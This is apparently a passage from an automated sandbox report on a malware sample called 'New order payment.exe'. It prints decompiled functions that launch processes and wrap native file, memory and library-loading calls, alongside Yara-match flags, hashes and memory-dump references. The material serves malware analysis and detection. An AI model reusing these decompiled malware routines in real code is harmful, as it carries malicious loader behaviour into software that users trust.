				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                0x00405401
                                                                0x0040541d
                                                                0x00405425
                                                                0x0040542a
                                                                0x00000000
                                                                0x00405430
                                                                0x00405434

                                                                APIs
                                                                Strings
                                                                • Error launching installer, xrefs: 0040540B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID: Error launching installer
                                                                • API String ID: 3712363035-66219284
                                                                • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                                • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                                                • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                                • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                                                                0x00403557
                                                                0x0040355f
                                                                0x00403566
                                                                0x00403569
                                                                0x00403569
                                                                0x0040356b
                                                                0x00403570
                                                                0x00403577
                                                                0x0040357d
                                                                0x00403581
                                                                0x00403582
                                                                0x0040358a

                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                                • GlobalFree.KERNEL32 ref: 00403577
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Free$GlobalLibrary
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 1100898210-823278215
                                                                • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                                                • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                0x004056d3
                                                                0x004056dd
                                                                0x004056df
                                                                0x004056e6
                                                                0x004056ee
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004056ee
                                                                0x004056f0
                                                                0x004056f5

                                                                APIs
                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New order payment.exe,C:\Users\user\Desktop\New order payment.exe,80000000,00000003), ref: 004056D8
                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New order payment.exe,C:\Users\user\Desktop\New order payment.exe,80000000,00000003), ref: 004056E6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CharPrevlstrlen
                                                                • String ID: C:\Users\user\Desktop
                                                                • API String ID: 2709904686-1246513382
                                                                • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                                                • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                0x004057f0
                                                                0x004057f2
                                                                0x0040581a
                                                                0x004057ff
                                                                0x00405804
                                                                0x0040580f
                                                                0x00000000
                                                                0x0040582c
                                                                0x00405818
                                                                0x00405818
                                                                0x00000000

                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                                • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Analysis Process: New order payment.exe PID: 2372 Parent PID: 4912 New order payment.exeCOMMON

                                                                Executed Functions

                                                                Function 0041867A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID: !:A$b=A$b=A
                                                                • API String ID: 2738559852-704622139
                                                                • Opcode ID: 2edeae232ff652c8cb3864f0775789f917dcf87ab9fdd337eef6cabbdfcd0d56
                                                                • Instruction ID: f0a7616db5dc8ab2843e66a576d22df772172ddbf993b150abda27aed2f380a7
                                                                • Opcode Fuzzy Hash: 2edeae232ff652c8cb3864f0775789f917dcf87ab9fdd337eef6cabbdfcd0d56
                                                                • Instruction Fuzzy Hash: C4F0F9B2200108ABCB14CF89CC84EEB77A9EF8C754F158249FA4D97241CA30E855CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 37%
                                                                			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                0x00418683
                                                                0x0041868f
                                                                0x00418697
                                                                0x0041869c
                                                                0x004186a2
                                                                0x004186bd
                                                                0x004186c5
                                                                0x004186c9

                                                                APIs
                                                                • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID: !:A$b=A$b=A
                                                                • API String ID: 2738559852-704622139
                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60(_a8, __eflags,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                0x00409b4c
                                                                0x00409b4f
                                                                0x00409b54
                                                                0x00409b59
                                                                0x00409b63
                                                                0x00409b68
                                                                0x00409b6b
                                                                0x00409b6d
                                                                0x00409b75
                                                                0x00409b7a
                                                                0x00409b7a
                                                                0x00409b81
                                                                0x00409b89
                                                                0x00409b8c
                                                                0x00409b8e
                                                                0x00409ba2
                                                                0x00000000
                                                                0x00409ba4
                                                                0x00409baa
                                                                0x00409b5e
                                                                0x00409b5e
                                                                0x00409b5e

                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                                                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004185CA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004185CA(void* __eax, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t24;
				void* _t34;

				_t18 = _v0;
				_t5 = _t18 + 0xc40; // 0xc40
				E004191D0(_t34, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t24;
			}






                                                                0x004185d3
                                                                0x004185df
                                                                0x004185e7
                                                                0x0041861d
                                                                0x00418621

                                                                APIs
                                                                • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 41858fedc908b5a1f91db60ab38041ae9a9e476a531c8cec1085a650bcff829e
                                                                • Instruction ID: e492d2eee3d474dd9e059b639aa8bb66731e046779164f58cf6d8ecf31579c31
                                                                • Opcode Fuzzy Hash: 41858fedc908b5a1f91db60ab38041ae9a9e476a531c8cec1085a650bcff829e
                                                                • Instruction Fuzzy Hash: 4601B6B2210208BBDB08CF89DC95EEB77EDAF8C754F158248FA0D97241D630E851CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                0x004185df
                                                                0x004185e7
                                                                0x0041861d
                                                                0x00418621

                                                                APIs
                                                                • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                0x004187bf
                                                                0x004187c7
                                                                0x004187e9
                                                                0x004187ed

                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004186FB, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 0d193cf8b217e625361985bacf9208ab4e22c3a12280cd643bcd6388af92c4ca
                                                                • Instruction ID: 1c0d342d4cf3058bb54a173b67a943a2e9698893856a94e0bab3fdaf19cfce77
                                                                • Opcode Fuzzy Hash: 0d193cf8b217e625361985bacf9208ab4e22c3a12280cd643bcd6388af92c4ca
                                                                • Instruction Fuzzy Hash: 85E0C2722002107BD714DBA4CC88FD77F68EF84360F0545A9F98DAB282C530E510C7D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                0x00418703
                                                                0x00418706
                                                                0x0041870f
                                                                0x00418717
                                                                0x00418725
                                                                0x00418729

                                                                APIs
                                                                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 334fe6a5f77c03c1344118229a102b18da48c8c631ce5b7c598848551bf341aa
                                                                • Instruction ID: 582e9bc50fa8b3005bd2c403c3cfb2aa01147864036b64f2e99bcf869e773fba
                                                                • Opcode Fuzzy Hash: 334fe6a5f77c03c1344118229a102b18da48c8c631ce5b7c598848551bf341aa
                                                                • Instruction Fuzzy Hash: 0290026169210502D21171694404616004A97D0381F91C033A1414565ECA658992F171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 4aaba14230a7974bc4931eff2788affbb79ddb0120b209a5dbff484e5e64f1ce
                                                                • Instruction ID: d451ceb919924c41816eb0d71f45bb879e8996e0076020949b5f4b9f364fd25d
                                                                • Opcode Fuzzy Hash: 4aaba14230a7974bc4931eff2788affbb79ddb0120b209a5dbff484e5e64f1ce
                                                                • Instruction Fuzzy Hash: 7D9002612D3141525655B16944045074046A7E0381B91C023A1804960C85669856E661
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: eb9e80da67f44b0aabe17a6b586e295a06877ae825d7d4473486875854900400
                                                                • Instruction ID: e3b5fcce9a63a209fcec87d4cf20ac7de6c902614137975e1acfa2c69b164d9a
                                                                • Opcode Fuzzy Hash: eb9e80da67f44b0aabe17a6b586e295a06877ae825d7d4473486875854900400
                                                                • Instruction Fuzzy Hash: 3F90027129210413D22161694504707004997D0381F91C423A0814568D96968952F161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3141acfb0513d4b9a255ae5c4a4eec7368234d4fe46c4a83bb7ab5d40580c0dd
                                                                • Instruction ID: 829ce934b4494b950d58799e7454c78ee3ea8376af9e6a01908cc8bb084e0c68
                                                                • Opcode Fuzzy Hash: 3141acfb0513d4b9a255ae5c4a4eec7368234d4fe46c4a83bb7ab5d40580c0dd
                                                                • Instruction Fuzzy Hash: 149002A13D210442D21061694414B060045D7E1341F51C026E1454564D8659CC52B166
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 130d3baf861513ac753587b838ddf0bc1523934ca16478a81bbb7ce5a3786644
                                                                • Instruction ID: 9fa7943fe28115c928016246957a4abcd2608c4416a91d55d63103b8350b57df
                                                                • Opcode Fuzzy Hash: 130d3baf861513ac753587b838ddf0bc1523934ca16478a81bbb7ce5a3786644
                                                                • Instruction Fuzzy Hash: F59002B129210402D25071694404746004597D0341F51C022A5454564E86998DD5B6A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 4170937500b8b9ae32a43300311ea8e34e2e230d7ebc542d2edb9402cc76e3aa
                                                                • Instruction ID: dd168fe65ed60d78b7e40a92a8f972e9da7d560df83eb0b67ca76a60158780f8
                                                                • Opcode Fuzzy Hash: 4170937500b8b9ae32a43300311ea8e34e2e230d7ebc542d2edb9402cc76e3aa
                                                                • Instruction Fuzzy Hash: 2C90027129250402D2106169481470B004597D0342F51C022A1554565D86658851B5B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ec1cc41f1aaa09fd7bf9188e3afd40ce8c1403560a9ad93ac93b6ebc09c6b4c0
                                                                • Instruction ID: a8abeab3d594d06311c112240322f0b97054c5f63fcfb0ef2e9161b417d3f39d
                                                                • Opcode Fuzzy Hash: ec1cc41f1aaa09fd7bf9188e3afd40ce8c1403560a9ad93ac93b6ebc09c6b4c0
